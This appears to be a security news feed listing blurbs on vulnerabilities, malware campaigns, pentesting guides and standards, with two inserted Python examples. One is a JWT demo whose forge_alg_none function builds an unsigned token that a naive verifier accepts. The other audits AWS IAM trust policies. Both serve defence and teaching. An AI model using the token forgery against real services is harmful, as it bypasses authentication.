https://www.hackmageddon.com/2024/05/08/1-15-february-2024-cyber-attacks-timeline/

ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.
Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.
For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html

Securing the Vault: ASPM's Role in Financial Software Protection
Safeguarding software integrity is crucial, especially in vital industries such as finance. According to a report by Carbon Black, the financial sector experiences an average of 10,000 security alerts per day, outstripping most other industries. As the technology landscape evolves and expands, it's imperative that your defenses strengthen alongside it. So, how do leading financial institutions shore up their cyber defenses and protect their software assets? The answer is Application Security Posture Management (ASPM). Join us as we explore ASPM's transformative impact on security practices in the U.S. financial services sector.
https://www.legitsecurity.com/blog/securing-the-vault-aspms-role-in-financial-software-protection

Bug Bounty: Insights from Our First-hand Experience
At Compass Security, we recently launched our managed bug bounty service. We openly invite hunters to probe our publicly exposed services for vulnerabilities. In return for their valuable feedback, we offer monetary bounties up to CHF 5000. This blog post presents an interesting vulnerability found by a hunter on the bug bounty program of our subsidiary, Hacking-Lab.
https://blog.compass-security.com/2024/05/bug-bounty-insights-from-our-first-hand-experience/

Lethal Injection
Multiple vulnerabilities were uncovered in Azure Health Bot service, Microsoft's health chatbot platform. These could have potentially exposed sensitive user data and granted attackers extensive control, allowing unrestricted code execution as root on the bot backend, unrestricted access to authentication secrets & integration auth providers, unrestricted memory read in the bot backend, exposing sensitive secrets, allowing cross-tenant data access and unrestricted deletion of other tenants' public resources. These issues stemmed from various bugs related to URL sanitization, shared compute, and sandboxing. Following disclosure, Microsoft changed the service architecture to run a completely separate ACI instance per customer, thereby mitigating future sandbox escapes, and changed the sandboxing...
https://www.cloudvulndb.org/lethal-injection

Protecting Model Updates in Privacy-Preserving Federated Learning: Part Two
The problem: The previous post in our series discussed techniques for providing input privacy in PPFL systems where data is horizontally partitioned. This blog will focus on techniques for providing input privacy when data is vertically partitioned. As described in our third post, vertical partitioning is where the training data is divided across parties such that each party holds different columns of the data. In contrast to horizontally partitioned data, training a model on vertically partitioned data is more challenging as it is generally not possible to train separate models on different
https://www.nist.gov/blogs/cybersecurity-insights/protecting-model-updates-privacy-preserving-federated-learning-part-two

Your Google Account allows you to create passkeys on your phone, computer and security keys
Sriram Karra and Christiaan Brand, Google product managers. Last year, Google launched passkey support for Google Accounts. Passkeys are a new industry standard that give users an easy, highly secure way to sign in to apps and websites. Today, we announced that passkeys have been used to authenticate users more than 1 billion times across over 400 million Google Accounts. As more users encounter passkeys, we're often asked questions about how they relate to security keys, how Google Workspace administrators can configure passkeys for the user accounts that they manage, and how they relate to the Advanced Protection Program (APP). This post will seek to clarify these topics. Passkeys and security keys: Passkeys are an evolution of security keys, meaning users get the same security benefits, but...
http://security.googleblog.com/2024/05/passkeys-on-your-phone-computer-and-security-keys.html

Take A Tour! NIST Cybersecurity Framework 2.0: Small Business Quick Start Guide
The U.S. Small Business Administration is celebrating National Small Business Week from April 28 - May 4, 2024. This week recognizes and celebrates the small business community's significant contributions to the nation. Organizations across the country participate by hosting in-person and virtual events, recognizing small business leaders and change-makers, and highlighting resources that help the small business community more easily and efficiently start and scale their businesses. To add to the festivities, this NIST Cybersecurity Insights blog showcases the NIST Cybersecurity Framework 2.0
https://www.nist.gov/blogs/cybersecurity-insights/take-tour-nist-cybersecurity-framework-20-small-business-quick-start

Where does your software (really) come from?
GitHub is working with the OSS community to bring new supply chain security capabilities to the platform. The post Where does your software (really) come from? appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/where-does-your-software-really-come-from/

Detecting browser data theft using Windows Event Logs
Posted by Will Harris, Chrome Security Team. Chromium's sandboxed process model defends well from malicious web content, but there are limits to how well the application can protect itself from malware already on the computer. Cookies and other credentials remain a high value target for attackers, and we are trying to tackle this ongoing threat in multiple ways, including working on web standards like DBSC that will help disrupt the cookie theft industry...
http://security.googleblog.com/2024/04/detecting-browser-data-theft-using.html

Sensor Intel Series: Top CVEs in March 2024
TP-Link Archer AX21 Wifi Router targeting, plus a handful of new CVEs! See what mass scanning looks like in March 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-march-2024

How we fought bad apps and bad actors in 2023
Posted by Steve Kafka and Khawaja Shams (Android Security and Privacy Team), and Mohet Saxena (Play Trust and Safety). A safe and trusted Google Play experience is our top priority. We leverage our SAFE (see below) principles to provide the framework to create that experience for both users and developers. Here's what these principles mean in practice: (S)afeguard our Users. Help them discover quality apps that they can trust. (A)dvocate for Developer Protection. Build platform safeguards to enable developers to focus on growth. (F)oster Responsible Innovation. Thoughtfully unlock value for all without compromising on user safety. (E)volve Platform Defenses. Stay ahead of emerging threats by evolving our policies, tools and technology. With those principles in mind, we've made...
http://security.googleblog.com/2024/04/how-we-fought-bad-apps-and-bad-actors-in-2023.html

CodeQL zero to hero part 3: Security research with CodeQL
Learn how to use CodeQL for security research and improve your security research workflow. The post CodeQL zero to hero part 3: Security research with CodeQL appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/codeql-zero-to-hero-part-3-security-research-with-codeql/

GraphNinja
A vulnerability in Microsoft Graph allowed attackers to conduct password-spray attacks without detection. The issue involved switching the 'common' authentication endpoint with that of an unrelated tenant, thereby avoiding the appearance of logon attempts in the victim's logs. This technique could allow attackers to validate user credentials through verbose error messages, but actual successful logons using these credentials would still be recorded in the victims' logs (regardless of endpoint).
https://www.cloudvulndb.org/graph-ninja

Disk Group Privilege Escalation
Disk Group Privilege Escalation is a complex attack method targeting vulnerabilities or misconfigurations within the disk group management system of Linux environments. Attackers might focus The post Disk Group Privilege Escalation appeared first on Hacking Articles.
https://www.hackingarticles.in/disk-group-privilege-escalation/

Accelerating incident response using generative AI
Lambert Rosique and Jan Keller, Security Workflow Automation, and Diana Kramer, Alexandra Bowen and Andrew Cho, Privacy and Security Incident Response. Introduction: As security professionals, we're constantly looking for ways to reduce risk and improve our workflow's efficiency. We've made great strides in using AI to identify malicious content, block threats, and discover and fix vulnerabilities. We also published the Secure AI Framework (SAIF), a conceptual framework for secure AI systems to ensure we are deploying AI in a responsible manner. Today we are highlighting another way we use generative AI to help the defenders gain the advantage: leveraging LLMs (Large Language Models) to speed up our security and privacy incident workflows. Incident management is a team sport. We have to summarize...
http://security.googleblog.com/2024/04/accelerating-incident-response-using.html

Jenkins Penetration Testing
Jenkins is an open-source automation server used for continuous integration (CI) and continuous delivery (CD). It’s built on Java and utilizes a scripting platform for The post Jenkins Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/jenkins-penetration-testing/

Securing millions of developers through 2FA
We've dramatically increased 2FA adoption on GitHub as part of our responsibility to make the software ecosystem more secure. Read on to learn how we secured millions of developers and why we're urging more organizations to join us in these efforts. The post Securing millions of developers through 2FA appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/securing-millions-of-developers-through-2fa/

January 2024 Cyber Attacks Statistics
In January 2024 I collected 288 events, with Cyber Crime continuing to lead the motivations, and ransomware leading the known attack techniques, ahead of Malware.
https://www.hackmageddon.com/2024/04/24/january-2024-cyber-attacks-statistics/

Tomcat Penetration Testing
Apache Tomcat, developed by the Apache Software Foundation, is a widely used web server and servlet container. Originally, it served as a demonstration platform for The post Tomcat Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/tomcat-penetration-testing/

GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers. The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining

New Burp Extension: JWT-scanner
Authentication and authorization are critical components of any application. Various standards and frameworks have been developed to facilitate the development of such components and make applications more secure. Among them, JSON Web Tokens (JWTs) have become a popular choice over the years. In this article, we discuss common flaws in JWT-based authentication and present our extension to automatically check for these issues in Burp: JWT-scanner.
https://blog.compass-security.com/2024/04/new-burp-extension-jwt-scanner/
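One of the classic flaws a JWT scanner probes for is a verifier that lets the token header choose the algorithm, so that a token with `alg: none` and an empty signature is accepted. The following Python is an added illustration, not code from the Compass extension or the article: a naive HS256 verifier that honours `alg: none` is shown beside a hardened one that fixes the algorithm server-side, requires a valid signature and enforces `exp`. The secret, claims and token values are constructed for the demo; only the standard library is used.

```python
import base64
import hashlib
import hmac
import json
import time

# Assumed shared HMAC key for the demo; a real deployment would load it from a secret store.
SECRET = b"constructed-demo-key-do-not-reuse"


def _b64url(raw: bytes) -> str:
    """base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_part(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a properly signed HS256 token (what the server hands to a client)."""
    signing_input = f"{_encode_part({'alg': 'HS256', 'typ': 'JWT'})}.{_encode_part(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def forge_alg_none(claims: dict) -> str:
    """What an attacker submits: header claims 'none', signature segment left empty."""
    return f"{_encode_part({'alg': 'none', 'typ': 'JWT'})}.{_encode_part(claims)}."


def verify_naive(token: str, key: bytes):
    """Vulnerable: the token picks the algorithm, so 'none' bypasses the signature check."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(_b64url_decode(claims_b64))
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{header_b64}.{claims_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return json.loads(_b64url_decode(claims_b64))
    return None


def verify_strict(token: str, key: bytes, now=None):
    """Hardened: algorithm fixed by the server, signature mandatory, exp enforced.
    Returns the claims on success and None on any failure."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, claims_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(sig_b64)
    except ValueError:  # malformed base64 or JSON
        return None
    if header.get("alg") != "HS256":  # never trust the header's choice
        return None
    expected = hmac.new(key, f"{header_b64}.{claims_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    claims = json.loads(_b64url_decode(claims_b64))
    current = time.time() if now is None else now
    if "exp" in claims and claims["exp"] <= current:
        return None
    return claims


if __name__ == "__main__":
    forged = forge_alg_none({"sub": "alice", "admin": True})
    print("naive verifier accepts alg=none:", verify_naive(forged, SECRET))
    print("strict verifier accepts alg=none:", verify_strict(forged, SECRET))
```

The point of `verify_strict` is that the server, not the token, decides which algorithm is acceptable; the same rule defends against the related RS256-to-HS256 key confusion, where a public key is fed to an HMAC verifier because the header asked for it.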

CVEs Targeting Remote Access Technologies
In this first quarter of 2024, threat actors have been particularly busy in exploiting vulnerabilities (0-days but also old unpatched flaws) targeting traditional remote access technologies. In this blog post I summarized the main CVEs exploited so far in 2024.
https://www.hackmageddon.com/2024/04/22/cves-targeting-remote-access-technologies/

Giving NIST Digital Identity Guidelines a Boost: Supplement for Incorporating Syncable Authenticators
We all need supplements sometimes. Whether it's a little extra vitamin C during flu season or some vitamin D during the dark days of Winter. When used correctly, supplements help our body adjust to the changing conditions around us. Similarly, we are applying this same concept for the first time to our NIST SP 800-63B, Digital Identity Guidelines: Authentication and Lifecycle Management. Today, we published a supplement that provides interim guidance for agencies seeking to make use of 'syncable authenticators' (for example, passkeys) in both enterprise-facing and public-facing use cases
https://www.nist.gov/blogs/cybersecurity-insights/giving-nist-digital-identity-guidelines-boost-supplement-incorporating

A Detailed Guide on Pwncat
Pwncat stands out as an open-source Python tool highly regarded for its versatility, providing a contemporary alternative to the traditional netcat utility. Tailored for network The post A Detailed Guide on Pwncat appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-pwncat/

AWS Response to March 2024 CSRB report
Publication Date: 2024/04/19 09:00 AM PDT AWS is aware of a recent Cyber Safety Review Board (CSRB) report regarding a 2023 Microsoft Online Exchange issue. We are not affected by the issues described in this report and no customer action is required. At AWS, security is our top priority. Every AWS customer benefits from the fact that we have the most operational experience of any cloud provider. We designed AWS from its very foundation to be the most secure way for our customers to run their workloads, and built our internal culture around security as a business imperative. The security of the AWS cloud is unique and differentiated by our technology, culture, and practices. To learn more, please refer to our "How the unique culture of security at AWS makes a difference" blog post....
https://aws.amazon.com/security/security-bulletins/AWS-2024-004/

The Windows Registry Adventure #2: A brief history of the feature
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-2.html

The Windows Registry Adventure #1: Introduction and research results
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-1.html

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […] The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams

ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.3.1: ClamAV 1.3.1 is a critical patch release with the following fixes: CVE-2024-20380: Fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition. This issue affects version 1.3.0 only and does not affect prior versions. Thank you to Błażej Pawłowski for identifying this issue. (GitHub pull request.) Updated select Rust dependencies to the latest versions. This resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html

CVE-2024-28056
Publication Date: 2024/04/15 07:00 AM PST AWS is aware of CVE-2024-28056, which affects Amplify CLI versions prior to 12.10.1 and Amplify Studio, which uses Amplify CLI. We released a fix to Amplify CLI on January 10, 2024 that also fixed Amplify Studio, and recommend customers upgrade to Amplify CLI 12.10.1 or higher to address this issue. We have proactively communicated with the customers using affected versions. AWS has taken two additional steps to protect customers using Amplify from unintentional misconfigurations. First, AWS added a mitigation to the AWS Security Token Service (STS) where attempts to make a cross-account role assumption with a trust policy referencing Amazon Cognito as the trusted principal, without conditions to scope down access to specific Amazon Cognito...
https://aws.amazon.com/security/security-bulletins/AWS-2024-003/

AWS Amplify IAM role publicly assumable exposure
The AWS Amplify service was found to be misconfiguring IAM roles associated with Amplify projects. This misconfiguration caused these roles to be assumable by any other AWS account. Both the Amplify Studio and the Amplify CLI exhibited this behavior. Any Amplify project created using the Amplify CLI built between July 3, 2018 and August 8, 2019 had IAM roles that were assumable by anyone in the world. The same was true if the authentication component was removed from an Amplify project using the Amplify CLI or Amplify Studio built between August 2019 and January 2024. AWS mitigated this vulnerability through backend changes to STS and IAM, and also released a patch for the Amplify CLI to ensure that newly created roles are properly configured in accordance with these changes.
https://www.cloudvulndb.org/aws-amplify-iam-role-publicly-assumable-exposure
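The two AWS entries above describe the same root cause from both sides: a role trust policy that names Amazon Cognito as the federated principal without a condition scoping it to one identity pool, which the STS mitigation in the CVE-2024-28056 bulletin now refuses. As an added example that is not part of either write-up and not an AWS tool, the Python below audits trust-policy documents for that exact shape. The policy documents, role names and identity-pool id are constructed placeholders; the real Amplify-generated roles are not reproduced.

```python
import json

# The federated principal and the condition key that should pin a statement to one pool.
COGNITO_PRINCIPAL = "cognito-identity.amazonaws.com"
COGNITO_AUD_KEY = "cognito-identity.amazonaws.com:aud"
WEB_IDENTITY_ACTIONS = {"sts:AssumeRoleWithWebIdentity", "sts:*", "*"}


def _as_list(value):
    """IAM policy JSON accepts a scalar wherever a list is allowed."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def unscoped_cognito_statements(trust_policy: dict) -> list:
    """Indexes of Allow statements that let Cognito identities assume the role
    without pinning the identity pool (aud). Such a statement is satisfied by an
    identity from any pool in any AWS account, which is the Amplify exposure."""
    findings = []
    for index, stmt in enumerate(_as_list(trust_policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        if not isinstance(principal, dict):
            continue  # a bare "*" principal is a different problem, out of scope here
        if COGNITO_PRINCIPAL not in _as_list(principal.get("Federated")):
            continue
        if not WEB_IDENTITY_ACTIONS.intersection(_as_list(stmt.get("Action"))):
            continue
        condition = stmt.get("Condition") or {}
        pinned = any(
            isinstance(keys, dict) and COGNITO_AUD_KEY in keys
            for keys in condition.values()
        )
        if not pinned:
            findings.append(index)
    return findings


def audit_roles(roles: dict) -> dict:
    """Map role name -> offending statement indexes; clean roles are omitted.
    Accepts policy documents as dicts or as JSON strings (as returned by IAM APIs)."""
    report = {}
    for name, doc in roles.items():
        policy = json.loads(doc) if isinstance(doc, str) else doc
        hits = unscoped_cognito_statements(policy)
        if hits:
            report[name] = hits
    return report


# Constructed sample documents (pool id is a placeholder, not a real pool).
WEAK_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": COGNITO_PRINCIPAL},
        "Action": "sts:AssumeRoleWithWebIdentity",
    }],
}

FIXED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": COGNITO_PRINCIPAL},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {
            "StringEquals": {COGNITO_AUD_KEY: "us-east-1:00000000-0000-0000-0000-000000000000"},
            "ForAnyValue:StringLike": {"cognito-identity.amazonaws.com:amr": "authenticated"},
        },
    }],
}

SERVICE_TRUST_POLICY = {  # ordinary instance role, unrelated to Cognito
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"}],
}


if __name__ == "__main__":
    print(audit_roles({
        "amplify-unauthRole": WEAK_TRUST_POLICY,
        "amplify-authRole": FIXED_TRUST_POLICY,
        "ec2-app-role": SERVICE_TRUST_POLICY,
    }))
```

In practice the dict passed to `audit_roles` would be built from `iam:ListRoles`, whose `AssumeRolePolicyDocument` field is the trust policy; the check only needs that document, so it runs against an export as easily as against the live API.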

AWS Glue database password leakage
A principal with the permissions glue:GetConnection and ec2:DescribeSubnets can retrieve the database password of a connection, since the password is loaded into the AWS console website when a connection's edit page is requested. The severity of this issue is low since it requires sufficient prior access.
https://www.cloudvulndb.org/aws-glue-database-password-leakage

A Detailed Guide on RustScan
In the realm of cybersecurity, network scanning tools play a vital role in reconnaissance and vulnerability assessment. Among the array of options available, Rustscan has The post A Detailed Guide on RustScan appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-rustscan/

Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities. This research paper is part of a broader program that aims to shed light on the security of the world's best-sellers in the IoT space. This report covers vulnerabilities discovered while researching the LG WebOS TV operating system. We have found several issues affecting WebOS versions 4 through 7 running on LG TVs. These vulnerabilities let us gain root acces
https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/

Behind The Scenes Of Ransomware Attacks
This is hopefully the most useless blog post you will read this year as this post will detail our experience dealing with ransomware cases. It is one of the most common reasons why we get called in to help and it has become a big business. Chainalysis, for example, has tracked $1.1 billion in ransomware […]
https://blog.compass-security.com/2024/04/behind-the-scenes-of-ransomware-attacks/

AWS IAM Trust Policy Condition Evaluation Bug
Tag variable names affected whether trust policy conditions were evaluated correctly. If the request tag referenced a principal tag called MemberRole in the JWT token, and the IAM role referenced a resource tag with the same variable name, the condition was always evaluated as true, regardless of whether the tag's values actually matched. Only role trust policies that used a variable substitution for both the request tag and the resource tag in the policy statement resulted in the policy evaluating incorrectly. The issue impacted statements within IAM boundary policies and SCP policies that contained the same pattern of STS role assumption with tag-based conditions.
https://www.cloudvulndb.org/aws-iam-trust-policy-condition-evaluation-bug

AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and crannies of the internet. So much so that cybercrooks are hitching free rides on the AI bandwagon by leveraging the increased demand of AI-powered software for content creators. Cybercriminal groups constantly adapt their operating methods and tools to stay a step ahead of potential victims. Highly focused on enhancing their deceptive practices, threat actors have, unfortunately, found a most reliable and powerful a
https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/

Security research without ever leaving GitHub: From code scanning to CVE via Codespaces and private vulnerability reporting
This blog post is an in-depth walkthrough on how we perform security research leveraging GitHub features, including code scanning, CodeQL, and Codespaces. The post Security research without ever leaving GitHub: From code scanning to CVE via Codespaces and private vulnerability reporting appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/security-research-without-ever-leaving-github-from-code-scanning-to-cve-via-codespaces-and-private-vulnerability-reporting/

CVE-2024-3094
Publication Date: 2024/03/29 12:30 PM PST CVE Identifier: CVE-2024-3094 AWS is aware of CVE-2024-3094, which affects versions 5.6.0 and 5.6.1 of the xz-utils package. This issue may attempt to introduce security issues in openssh through the use of liblzma within some operating system environments. Amazon Linux customers are not affected by this issue, and no action is required. AWS infrastructure and services do not utilize the affected software and are not impacted. Users of Bottlerocket are not affected. Customers using other operating systems are advised to refer to information provided by the OS vendor to address any concerns originating from this reported issue. Security-related questions or concerns can be brought to our attention via aws-security@amazon.com.
https://aws.amazon.com/security/security-bulletins/AWS-2024-002/

Pwn2Own Toronto 2023: Part 5 – The Exploit
In this final part of this series, we are finally going to explain how the stack-based buffer overflow vulnerability can be exploited to gain unauthenticated remote code execution (RCE) on the Synology BC500 camera.
https://blog.compass-security.com/2024/03/pwn2own-toronto-2023-part-5-the-exploit/

Sensor Intel Series: Top CVEs in February 2024
27 new CVEs, and continued IoT targeting. See what's new from February 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-february-2024

Pwn2Own Toronto 2023: Part 4 – Memory Corruption Analysis
In this fourth part of the series, we analyze the memory corruption identified previously and manage to overwrite the program pointer!
https://blog.compass-security.com/2024/03/pwn2own-toronto-2023-part-4-memory-corruption-analysis/

Pwn2Own Toronto 2023: Part 3 – Exploration
In this third part of the series, we focus on the exposed web services running on TCP ports 80 and 443. Since a valid exploit chain must achieve code execution without prior authentication, we focus on the available functionality that can be accessed without authentication.
https://blog.compass-security.com/2024/03/pwn2own-toronto-2023-part-3-exploration/

Protecting Model Updates in Privacy-Preserving Federated Learning
In our second post we described attacks on models and the concepts of input privacy and output privacy. In our last post, we described horizontal and vertical partitioning of data in privacy-preserving federated learning (PPFL) systems. In this post, we explore the problem of providing input privacy in PPFL systems for the horizontally-partitioned setting. Models, training, and aggregation: To explore techniques for input privacy in PPFL, we first have to be more precise about the training process. In horizontally-partitioned federated learning, a common approach is to ask each participant to
https://www.nist.gov/blogs/cybersecurity-insights/protecting-model-updates-privacy-preserving-federated-learning

FlowFixation
A flaw in Amazon Managed Workflows for Apache Airflow (MWAA) could have allowed potential session hijacking and remote code execution. The issue stemmed from a combination of session fixation in the MWAA web management panel and an AWS domain configuration error leading to a cross-site scripting (XSS) attack. Attackers exploiting this could manipulate victims' configurations, trigger workflows, and potentially move laterally to other services within the cloud environment. The exploit of this bug involved deploying malicious code via an Amazon API Gateway that interacts with the victim's Airflow instance, setting a session cookie that bypasses normal authentication and grants the attacker access.
https://www.cloudvulndb.org/flowfixation

Gaining kernel code execution on an MTE-enabled Pixel 8
In this post, I'll look at CVE-2023-6241, a vulnerability in the Arm Mali GPU that allows a malicious app to gain arbitrary kernel code execution and root on an Android phone. I'll show how this vulnerability can be exploited even when Memory Tagging Extension (MTE), a powerful mitigation, is enabled on the device. The post Gaining kernel code execution on an MTE-enabled Pixel 8 appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/

2024 Bad Bots Review
Learn the latest trends in bots and malicious automation so you can compare with attacks against your own organizations.
https://www.f5.com/labs/articles/threat-intelligence/2024-bad-bots-review

Synapse Analytics privilege escalation via intelligent caching
Tenable Research discovered a privilege escalation flaw that allows a user to escalate privileges to that of the root user within the context of a Spark VM. This escalation was achieved because of a permissions issue with scripts utilized by the intelligent caching service (AKA "Vegas") present in the environment.
https://www.cloudvulndb.org/synapse-vegas-lpe

Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端) a.k.a. Xunlei Thunder by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing. I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept user's network connections (Man-in-the-Middle attack). It does not appear like security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/

Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams. In the past couple of months, Bitdefender Labs has been monitoring a steep increase in fraudulent social media ads on Facebook promoting various swindles ranging from crypto-doubling [https://www.bitdefender.com/blog/labs/stream-jacking-2-0-deep-fakes-power-account-takeovers-on-youtube-to-maximize-crypto-doubling-scams/] to AI-generated celebrity-endorsed giveaways [https://www.bitdefender.com/blog/labs/audio-deepfakes-celebrity-endorsed-givea
https://www.bitdefender.com/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media/

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro. The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day

Updates on NIST's Interagency International Cybersecurity Standardization Working Group
Last November, I was pleased to chair the most recent meeting of the Interagency International Cybersecurity Standardization Working Group (IICSWG) – a group NIST created in 2016. Our charge, from the Cybersecurity Enhancement Act of 2014, was to build a coordination mechanism for government agencies to discuss international cybersecurity standardization issues, consistent with agencies' responsibilities under OMB Circular A-119. Since then, IICSWG has grown as a forum to discuss cybersecurity and privacy standardization topics, examine the overall cybersecurity standardization landscape (
https://www.nist.gov/blogs/cybersecurity-insights/updates-nists-interagency-international-cybersecurity-standardization

When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection capabilities for our macOS cyber-security products; part of this effort involves revisiting old (or digging up new) samples from our malware zoo. During routine verifications, we were able to isolate multiple suspicious and undetected macOS disk image files surprisingly small for files of this kind (1.3 MB per file). A short look into the code revealed that these files are significantly similar to other samples analysed in the
https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/

Data Distribution in Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Our first post in the series introduced the concept of federated learning and described how it's different from traditional centralized learning - in federated learning, the data is distributed among participating organizations, and
https://www.nist.gov/blogs/cybersecurity-insights/data-distribution-privacy-preserving-federated-learning

Travel Update! The NIST CSF 2.0 is HERE…Along with Many Helpful Resources…
NIST CSF 2.0 QUICK LINKS | Explore our Full Suite of Resources: CSF 2.0 Quick Start Guides; CSF 2.0 Profiles; CSF 2.0 Informative References; Cybersecurity & Privacy Reference Tool (CPRT); CSF 2.0 Reference Tool; CSF 2.0 Website (Homepage); Official NIST News Announcement. The NIST Cybersecurity Framework (CSF) development process all started with Executive Order (EO) 13636 over a decade ago, which called for building a set of approaches (a framework) for reducing risks to critical infrastructure. Through this EO, NIST was tasked with developing a "Cybersecurity Framework." We knew that, to do
https://www.nist.gov/blogs/cybersecurity-insights/travel-update-nist-csf-20-herealong-many-helpful-resources

Looking Forward, Looking Back: A Quarter Century as a CISO
Gail Coury explores how cybersecurity has evolved and what the future holds, after a distinguished career as a CISO.
https://www.f5.com/labs/articles/cisotociso/looking-forward-looking-back-a-quarter-century-as-a-ciso

